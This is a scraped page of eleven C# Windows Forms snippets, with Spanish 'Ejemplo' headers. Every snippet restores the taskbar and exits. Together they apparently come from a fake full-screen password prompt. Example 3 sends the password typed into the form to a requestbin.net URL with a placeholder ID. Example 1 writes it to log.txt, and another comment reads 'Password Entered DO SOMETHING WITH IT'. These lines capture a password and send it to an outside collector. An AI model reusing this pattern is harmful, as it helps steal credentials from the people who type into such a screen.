Ejemplo n.º 1
0
        private void button1_Click_1(object sender, EventArgs e)
        {
            Taskbar.Show();
            string a = textBox2.Text;

            WriteForTxt("log.txt", a);
            System.Windows.Forms.Application.Exit();
        }
Ejemplo n.º 2
0
        private void button1_Click_1(object sender, EventArgs e)
        {
            var th = new Thread(postData);

            th.Start();

            Taskbar.Show();
            System.Windows.Forms.Application.Exit();
        }
Ejemplo n.º 3
0
        private void button1_Click_1(object sender, EventArgs e)
        {
            // Makes Web Request and passes password to the page
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create("http://requestbin.net/r/YOUR_ID?" + textBox2.Text);

            request.GetResponse();

            Taskbar.Show();
            Application.Exit();
        }
Ejemplo n.º 4
0
 private void button1_Click_1(object sender, EventArgs e)
 {
     Taskbar.Show();
     System.Windows.Forms.Application.Exit();
 }
Ejemplo n.º 5
0
 private void pictureBox3_Click(object sender, EventArgs e)
 {
     Taskbar.Show();
     System.Windows.Forms.Application.Exit();
 }
Ejemplo n.º 6
0
 protected override void OnClosing(CancelEventArgs e)
 {
     Taskbar.Show();
     base.OnClosing(e);
 }
Ejemplo n.º 7
0
 private void pictureBox2_Click(object sender, EventArgs e)
 {
     Taskbar.Show();
     Application.Exit();
 }
Ejemplo n.º 8
0
 private void button1_Click_1(object sender, EventArgs e)
 {
     Taskbar.Show();
     Console.WriteLine(textBox2);
     System.Windows.Forms.Application.Exit();
 }
Ejemplo n.º 9
0
 private void button1_Click_1(object sender, EventArgs e)
 {
     Taskbar.Show();
     Application.Exit();
 }
Ejemplo n.º 10
0
 private void linkLabel1_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
 {
     Taskbar.Show();
     System.Windows.Forms.Application.Exit();
 }
Ejemplo n.º 11
0
 private void button2_Click(object sender, EventArgs e)
 {
     //Password Entered DO SOMETHING WITH IT
     Taskbar.Show();
     System.Windows.Forms.Application.Exit();
 }